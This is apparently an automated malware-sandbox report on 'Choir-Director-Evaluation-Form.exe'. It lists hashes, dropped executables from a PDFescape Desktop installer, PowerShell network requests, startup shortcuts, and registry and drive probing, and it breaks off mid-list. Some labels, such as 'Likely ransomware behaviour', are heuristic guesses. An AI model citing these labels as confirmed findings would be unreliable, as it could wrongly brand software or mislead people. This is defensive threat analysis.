Analysis
-
max time kernel
145s -
max time network
149s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
27-05-2021 12:12
Static task
static1
Behavioral task
behavioral1
Sample
Choir-Director-Evaluation-Form.exe
Resource
win7v20210408
General
-
Target
Choir-Director-Evaluation-Form.exe
-
Size
107.7MB
-
MD5
e4b18058271e4c9bfc7e3759a6132437
-
SHA1
70248c40ca94932a7f098a26ee7858bda5903d73
-
SHA256
8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1
-
SHA512
4bf709dc7e3e32d7a694732b60150ea97b834465a8074d6b3d4acab0633d3e6f2a96d211f04c58397032bf60e8b4e172c775c95b3afe8765f8e2f1b650c6a045
Malware Config
Signatures
-
Registers COM server for autorun 1 TTPs
-
Blocklisted process makes network request 8 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeflow pid process 43 3152 powershell.exe 44 2184 powershell.exe 45 4100 powershell.exe 55 3872 powershell.exe 43 3152 powershell.exe 44 2184 powershell.exe 45 4100 powershell.exe 55 3872 powershell.exe -
Executes dropped EXE 10 IoCs
Processes:
Choir-Director-Evaluation-Form.tmpPDFescape_Desktop_Installer.exePDFescapeDesktopInstaller.exews.exeupdater-ws.exeprinter-installer-app.execreator-app.execreator-ws.exeescape.exews.exepid process 1520 Choir-Director-Evaluation-Form.tmp 2824 PDFescape_Desktop_Installer.exe 3176 PDFescapeDesktopInstaller.exe 5484 ws.exe 6364 updater-ws.exe 7416 printer-installer-app.exe 10380 creator-app.exe 2076 creator-ws.exe 12644 escape.exe 12752 ws.exe -
Registers new Print Monitor 2 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
PDFescape_Desktop_Installer.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation PDFescape_Desktop_Installer.exe -
Drops startup file 4 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNk powershell.exe File created C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNk powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNk powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNk powershell.exe -
Loads dropped DLL 64 IoCs
Processes:
Choir-Director-Evaluation-Form.tmpregsvr32.exeDllHost.exePDFescape_Desktop_Installer.exeMsiExec.exeMsiExec.exeMsiExec.exeMsiExec.exews.exeMsiExec.exeupdater-ws.exeMsiExec.exeMsiExec.exeMsiExec.exeMsiExec.exeMsiExec.exeMsiExec.exeMsiExec.exeprinter-installer-app.exespoolsv.execreator-app.execreator-ws.exeescape.exepid process 1520 Choir-Director-Evaluation-Form.tmp 1520 Choir-Director-Evaluation-Form.tmp 784 regsvr32.exe 4040 DllHost.exe 2824 PDFescape_Desktop_Installer.exe 12172 MsiExec.exe 4396 MsiExec.exe 4396 MsiExec.exe 4396 MsiExec.exe 4396 MsiExec.exe 4396 MsiExec.exe 780 MsiExec.exe 5144 MsiExec.exe 5484 ws.exe 5484 ws.exe 5484 ws.exe 5484 ws.exe 5484 ws.exe 5484 ws.exe 5484 ws.exe 5484 ws.exe 5484 ws.exe 5484 ws.exe 6088 MsiExec.exe 6364 updater-ws.exe 6364 updater-ws.exe 6364 updater-ws.exe 6364 updater-ws.exe 6364 updater-ws.exe 6364 updater-ws.exe 6364 updater-ws.exe 11144 MsiExec.exe 6032 MsiExec.exe 5136 MsiExec.exe 5232 MsiExec.exe 816 MsiExec.exe 5176 MsiExec.exe 4452 MsiExec.exe 7416 printer-installer-app.exe 1540 10640 spoolsv.exe 10640 spoolsv.exe 10640 spoolsv.exe 10380 creator-app.exe 10380 creator-app.exe 10380 creator-app.exe 10380 creator-app.exe 10380 creator-app.exe 2076 creator-ws.exe 2076 creator-ws.exe 2076 creator-ws.exe 12644 escape.exe 12644 escape.exe 12644 escape.exe 12644 escape.exe 12644 escape.exe 12644 escape.exe 12644 escape.exe 12644 escape.exe 12644 escape.exe 12644 escape.exe 12644 escape.exe 12644 escape.exe 12644 escape.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exedescription ioc process File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\X: msiexec.exe -
Installs/modifies Browser Helper Object 2 TTPs
BHOs are DLL modules which act as plugins for Internet Explorer.
-
Drops file in System32 directory 11 IoCs
Processes:
printer-installer-app.exespoolsv.exemsiexec.exedescription ioc process File created C:\Windows\system32\spool\DRIVERS\x64\pdfescape desktop_pdfprnui_v.4.12.26.3.hlp printer-installer-app.exe File created C:\Windows\system32\spool\DRIVERS\x64\3\New\pdfescape desktop_pdfprn_v.4.12.26.3.dll spoolsv.exe File created C:\Windows\system32\spool\DRIVERS\x64\3\New\pdfescape desktop_pdfprnui_v.4.12.26.3.dll spoolsv.exe File opened for modification C:\Windows\system32\spool\DRIVERS\x64\pdfescape desktop_pdfprn_v.4.12.26.3.dll spoolsv.exe File created C:\Windows\system32\spool\DRIVERS\x64\pdfescape desktop_pdfprnui_v.4.12.26.3.dll printer-installer-app.exe File created C:\Windows\system32\spool\DRIVERS\x64\pdfescape desktop_pdfprn_v.4.12.26.3.dll printer-installer-app.exe File created C:\Windows\system32\spool\DRIVERS\x64\pdfescape desktop_pdfpmon_v.4.12.26.3.dll printer-installer-app.exe File created C:\Windows\system32\spool\DRIVERS\x64\3\New\pdfescape desktop_pdfprnui_v.4.12.26.3.hlp spoolsv.exe File opened for modification C:\Windows\system32\spool\DRIVERS\x64\pdfescape desktop_pdfprnui_v.4.12.26.3.hlp spoolsv.exe File opened for modification C:\Windows\system32\spool\DRIVERS\x64\pdfescape desktop_pdfprnui_v.4.12.26.3.dll spoolsv.exe File opened for modification C:\Windows\SysWOW64\msvcp140_2.dll msiexec.exe -
Drops file in Program Files directory 64 IoCs
Processes:
msiexec.exedescription ioc process File created C:\Program Files\PDFescape Desktop\sp\root\root.csp msiexec.exe File created C:\Program Files\PDFescape Desktop\creator\common\resources\Core\Encodings\AdobeStandardEncoding msiexec.exe File created C:\Program Files\PDFescape Desktop\sp\bl\bl.csp msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\Core\Encodings\Big5Encoding msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\Core\Templates\StickerPressed msiexec.exe File created C:\Program Files\PDFescape Desktop\ui-document-panel-layers.dll msiexec.exe File created C:\Program Files\PDFescape Desktop\creator\plugins\IEAddin\creator-ie-plugin.dll msiexec.exe File created C:\Program Files\PDFescape Desktop\creator\plugins\OfficeAddin\creator-powerpoint-plugin.dll msiexec.exe File created C:\Program Files\PDFescape Desktop\creator\common\resources\Core\Templates\StickerPressed msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\Core\Encodings\AdobeExpertEncoding msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\Core\Encodings\AdobeStandardEncoding msiexec.exe File created C:\Program Files\PDFescape Desktop\logger.dll msiexec.exe File created C:\Program Files\PDFescape Desktop\pdfgraphics.dll msiexec.exe File created C:\Program Files\PDFescape Desktop\plugins\plugin-text-markup.dll msiexec.exe File created C:\Program Files\PDFescape Desktop\ui-options.dll msiexec.exe File created C:\Program Files\PDFescape Desktop\web-link-store.dll msiexec.exe File created C:\Program Files\PDFescape Desktop\creator\common\localization\it\info.json msiexec.exe File created C:\Program Files\PDFescape Desktop\localization\pt\info.json msiexec.exe File created C:\Program Files\PDFescape Desktop\libidn.dll msiexec.exe File created C:\Program Files\PDFescape Desktop\localization\de\icon.png msiexec.exe File created C:\Program Files\PDFescape Desktop\localization\it\messages.dat msiexec.exe File created C:\Program Files\PDFescape Desktop\plugins\plugin-acroform.dll msiexec.exe File created C:\Program Files\PDFescape Desktop\ui-floating-toolbar.dll msiexec.exe File created C:\Program Files\PDFescape Desktop\creator\common\resources\Core\CMap\Identity-H msiexec.exe File created C:\Program Files\PDFescape Desktop\creator\common\localization\ja\messages.dat msiexec.exe File created C:\Program Files\PDFescape Desktop\localization\Click on 'Change' to select default pdf handler.pdf msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\Scripts\Common.js msiexec.exe File created C:\Program Files\PDFescape Desktop\creator\common\pdfcore.dll msiexec.exe File created C:\Program Files\PDFescape Desktop\localization\ja\info.json msiexec.exe File created C:\Program Files\PDFescape Desktop\localization\it\icon.png msiexec.exe File created C:\Program Files\PDFescape Desktop\localization\de\messages.dat msiexec.exe File created C:\Program Files\PDFescape Desktop\plugins-manager.dll msiexec.exe File created C:\Program Files\PDFescape Desktop\ui.dll msiexec.exe File created C:\Program Files\PDFescape Desktop\ui-document-panel-page-preview.dll msiexec.exe File created C:\Program Files\PDFescape Desktop\bl.dll msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\Core\icudt58l.dat msiexec.exe File created C:\Program Files\PDFescape Desktop\creator\plugins\OfficeAddin\creator-word-plugin.dll msiexec.exe File created C:\Program Files\PDFescape Desktop\creator\common\resources\Core\Encodings\GB2312Encoding msiexec.exe File opened for modification C:\Program Files\PDFescape Desktop\brand.dll msiexec.exe File opened for modification C:\Program Files\PDFescape Desktop\root-service-provider.dll msiexec.exe File created C:\Program Files\PDFescape Desktop\localization\en\messages.dat msiexec.exe File created C:\Program Files\PDFescape Desktop\ui-document-panel-attachments.dll msiexec.exe File created C:\Program Files\PDFescape Desktop\ui-engine.dll msiexec.exe File created C:\Program Files\PDFescape Desktop\creator\common\resources\Core\Encodings\Big5Encoding msiexec.exe File created C:\Program Files\PDFescape Desktop\bl-creator-module.dll msiexec.exe File created C:\Program Files (x86)\PDFescape Desktop\creator\plugins\IEAddin\creator-ie-helper.dll msiexec.exe File created C:\Program Files\PDFescape Desktop\crash-handler.dll msiexec.exe File created C:\Program Files\PDFescape Desktop\localization\pt\icon.png msiexec.exe File created C:\Program Files\PDFescape Desktop\ui-creator-module.dll msiexec.exe File created C:\Program Files\PDFescape Desktop\ui-scan.dll msiexec.exe File created C:\Program Files\PDFescape Desktop\creator\common\creator-ws.exe msiexec.exe File created C:\Program Files\PDFescape Desktop\creator\common\localization\pt\icon.png msiexec.exe File created C:\Program Files\PDFescape Desktop\settings.dll msiexec.exe File created C:\Program Files\PDFescape Desktop\creator\common\resources\Core\Encodings\WansungEncoding msiexec.exe File created C:\Program Files (x86)\PDFescape Desktop\crash-handler.dll msiexec.exe File created C:\Program Files\PDFescape Desktop\htmlayout.dll msiexec.exe File created C:\Program Files\PDFescape Desktop\pdfcore.dll msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\Core\Icons\sticker.normal.txt msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\Core\Color\USWebCoatedSWOP.icc msiexec.exe File created C:\Program Files\PDFescape Desktop\creator\common\resources\Core\Encodings\AdobeExpertEncoding msiexec.exe File created C:\Program Files\PDFescape Desktop\creator\common\brand.dll msiexec.exe File created C:\Program Files\PDFescape Desktop\bl-service-provider.dll msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\Core\Encodings\JohabEncoding msiexec.exe File created C:\Program Files\PDFescape Desktop\resources\Core\Encodings\MSSymbolEncoding msiexec.exe -
Drops file in Windows directory 64 IoCs
Processes:
msiexec.exedescription ioc process File opened for modification C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\enterprise_icon.5C9BBFCE_F40D_4866_BD03_B64A7523DB29 msiexec.exe File created C:\Windows\Installer\{CCBE3E06-E721-410C-8D36-EDEF37F56743}\edit_icon msiexec.exe File opened for modification C:\Windows\Installer\{CCBE3E06-E721-410C-8D36-EDEF37F56743}\business_icon msiexec.exe File opened for modification C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\convert_icon msiexec.exe File created C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\create_icon msiexec.exe File created C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\ocr_icon msiexec.exe File opened for modification C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\edit_icon.5C9BBFCE_F40D_4866_BD03_B64A7523DB29 msiexec.exe File opened for modification C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\business_icon.5C9BBFCE_F40D_4866_BD03_B64A7523DB29 msiexec.exe File created C:\Windows\Installer\{CCBE3E06-E721-410C-8D36-EDEF37F56743}\review_icon msiexec.exe File created C:\Windows\Installer\$PatchCache$\Managed\ECAB801F0EC2B7449A35862E10F9B766\4.0.24\msvcp140_2.dll.56E049E7_36C3_3941_98AD_414884F67502 msiexec.exe File opened for modification C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\ocr_icon msiexec.exe File created C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\ocr_icon.5C9BBFCE_F40D_4866_BD03_B64A7523DB29 msiexec.exe File created C:\Windows\Installer\$PatchCache$\Managed\60E3EBCC127EC014D863DEFE735F7634\4.0.24\msvcp140_2.dll.56E049E7_36C3_3941_98AD_414884F67502 msiexec.exe File created C:\Windows\Installer\{CCBE3E06-E721-410C-8D36-EDEF37F56743}\insert_icon msiexec.exe File opened for modification C:\Windows\Installer\{CCBE3E06-E721-410C-8D36-EDEF37F56743}\forms_icon msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\$PatchCache$\Managed\ECAB801F0EC2B7449A35862E10F9B766\4.0.24\vccorlib140.dll.56E049E7_36C3_3941_98AD_414884F67502 msiexec.exe File created C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\install_icon.5C9BBFCE_F40D_4866_BD03_B64A7523DB29 msiexec.exe File opened for modification C:\Windows\Installer\$PatchCache$\Managed\60E3EBCC127EC014D863DEFE735F7634\4.0.24\concrt140.dll.CC943011_A332_3C6E_AE5A_D28E3EC152B8 msiexec.exe File created C:\Windows\Installer\$PatchCache$\Managed\60E3EBCC127EC014D863DEFE735F7634\4.0.24\vccorlib140.dll.56E049E7_36C3_3941_98AD_414884F67502 msiexec.exe File opened for modification C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\create_icon msiexec.exe File created C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\main_icon.5C9BBFCE_F40D_4866_BD03_B64A7523DB29 msiexec.exe File opened for modification C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\create_icon.5C9BBFCE_F40D_4866_BD03_B64A7523DB29 msiexec.exe File opened for modification C:\Windows\Installer\{CCBE3E06-E721-410C-8D36-EDEF37F56743}\secure_icon msiexec.exe File opened for modification C:\Windows\Installer\{CCBE3E06-E721-410C-8D36-EDEF37F56743}\enterprise_icon msiexec.exe File opened for modification C:\Windows\Installer\$PatchCache$\Managed\ECAB801F0EC2B7449A35862E10F9B766\4.0.24 msiexec.exe File created C:\Windows\Installer\$PatchCache$\Managed\ECAB801F0EC2B7449A35862E10F9B766\4.0.24\concrt140.dll.56E049E7_36C3_3941_98AD_414884F67502 msiexec.exe File created C:\Windows\Installer\$PatchCache$\Managed\ECAB801F0EC2B7449A35862E10F9B766\4.0.24\msvcp140.dll.56E049E7_36C3_3941_98AD_414884F67502 msiexec.exe File opened for modification C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\forms_icon.5C9BBFCE_F40D_4866_BD03_B64A7523DB29 msiexec.exe File opened for modification C:\Windows\Installer\$PatchCache$\Managed\60E3EBCC127EC014D863DEFE735F7634\4.0.24\concrt140.dll.56E049E7_36C3_3941_98AD_414884F67502 msiexec.exe File opened for modification C:\Windows\Installer\$PatchCache$\Managed\ECAB801F0EC2B7449A35862E10F9B766 msiexec.exe File created C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\create_icon.5C9BBFCE_F40D_4866_BD03_B64A7523DB29 msiexec.exe File created C:\Windows\Installer\$PatchCache$\Managed\60E3EBCC127EC014D863DEFE735F7634\4.0.24\concrt140.dll.CC943011_A332_3C6E_AE5A_D28E3EC152B8 msiexec.exe File opened for modification C:\Windows\Installer\$PatchCache$\Managed\60E3EBCC127EC014D863DEFE735F7634\4.0.24\vccorlib140.dll.CC943011_A332_3C6E_AE5A_D28E3EC152B8 msiexec.exe File opened for modification C:\Windows\Installer\{CCBE3E06-E721-410C-8D36-EDEF37F56743}\ocr_icon msiexec.exe File opened for modification C:\Windows\Installer\$PatchCache$\Managed\60E3EBCC127EC014D863DEFE735F7634\4.0.24\msvcp140.dll.CC943011_A332_3C6E_AE5A_D28E3EC152B8 msiexec.exe File opened for modification C:\Windows\Installer\{CCBE3E06-E721-410C-8D36-EDEF37F56743}\insert_icon msiexec.exe File created C:\Windows\Installer\$PatchCache$\Managed\ECAB801F0EC2B7449A35862E10F9B766\4.0.24\msvcp140_1.dll.56E049E7_36C3_3941_98AD_414884F67502 msiexec.exe File opened for modification C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\main_icon msiexec.exe File opened for modification C:\Windows\Installer\$PatchCache$\Managed\60E3EBCC127EC014D863DEFE735F7634\4.0.24 msiexec.exe File opened for modification C:\Windows\Installer\$PatchCache$\Managed\60E3EBCC127EC014D863DEFE735F7634\4.0.24\msvcp140_2.dll.56E049E7_36C3_3941_98AD_414884F67502 msiexec.exe File opened for modification C:\Windows\Installer\$PatchCache$\Managed\60E3EBCC127EC014D863DEFE735F7634\4.0.24\vccorlib140.dll.56E049E7_36C3_3941_98AD_414884F67502 msiexec.exe File opened for modification C:\Windows\Installer\$PatchCache$\Managed\ECAB801F0EC2B7449A35862E10F9B766\4.0.24\msvcp140.dll.CC943011_A332_3C6E_AE5A_D28E3EC152B8 msiexec.exe File opened for modification C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\secure_icon msiexec.exe File created C:\Windows\Installer\$PatchCache$\Managed\60E3EBCC127EC014D863DEFE735F7634\4.0.24\msvcp140_1.dll.56E049E7_36C3_3941_98AD_414884F67502 msiexec.exe File opened for modification C:\Windows\Installer\$PatchCache$\Managed\60E3EBCC127EC014D863DEFE735F7634\4.0.24\msvcp140_1.dll.CC943011_A332_3C6E_AE5A_D28E3EC152B8 msiexec.exe File created C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\secure_icon msiexec.exe File created C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\asian_icon msiexec.exe File opened for modification C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\insert_icon.5C9BBFCE_F40D_4866_BD03_B64A7523DB29 msiexec.exe File created C:\Windows\Installer\{CCBE3E06-E721-410C-8D36-EDEF37F56743}\create_icon msiexec.exe File opened for modification C:\Windows\Installer\{CCBE3E06-E721-410C-8D36-EDEF37F56743}\asian_icon msiexec.exe File opened for modification C:\Windows\Installer\{CCBE3E06-E721-410C-8D36-EDEF37F56743}\main_icon msiexec.exe File created C:\Windows\Installer\$PatchCache$\Managed\ECAB801F0EC2B7449A35862E10F9B766\4.0.24\vccorlib140.dll.CC943011_A332_3C6E_AE5A_D28E3EC152B8 msiexec.exe File opened for modification C:\Windows\Installer\$PatchCache$\Managed\ECAB801F0EC2B7449A35862E10F9B766\4.0.24\vcruntime140.dll.CC943011_A332_3C6E_AE5A_D28E3EC152B8 msiexec.exe File opened for modification C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\edit_icon msiexec.exe File created C:\Windows\Installer\$PatchCache$\Managed\60E3EBCC127EC014D863DEFE735F7634\4.0.24\msvcp140.dll.CC943011_A332_3C6E_AE5A_D28E3EC152B8 msiexec.exe File created C:\Windows\Installer\$PatchCache$\Managed\60E3EBCC127EC014D863DEFE735F7634\4.0.24\vccorlib140.dll.CC943011_A332_3C6E_AE5A_D28E3EC152B8 msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\business_icon msiexec.exe File opened for modification C:\Windows\Installer\MSI7B5.tmp msiexec.exe File opened for modification C:\Windows\Installer\{CCBE3E06-E721-410C-8D36-EDEF37F56743}\edit_icon msiexec.exe File opened for modification C:\Windows\Installer\{CCBE3E06-E721-410C-8D36-EDEF37F56743}\install_icon msiexec.exe File created C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\uninstall_icon msiexec.exe File created C:\Windows\Installer\{F108BACE-2CE0-447B-A953-68E2019F7B66}\main_icon msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
svchost.exespoolsv.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000 spoolsv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0002 spoolsv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{f01fac5d-e5f6-485f-a8c6-27446425998c}\0002 spoolsv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000 spoolsv.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Capabilities svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Capabilities svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A svchost.exe Key opened 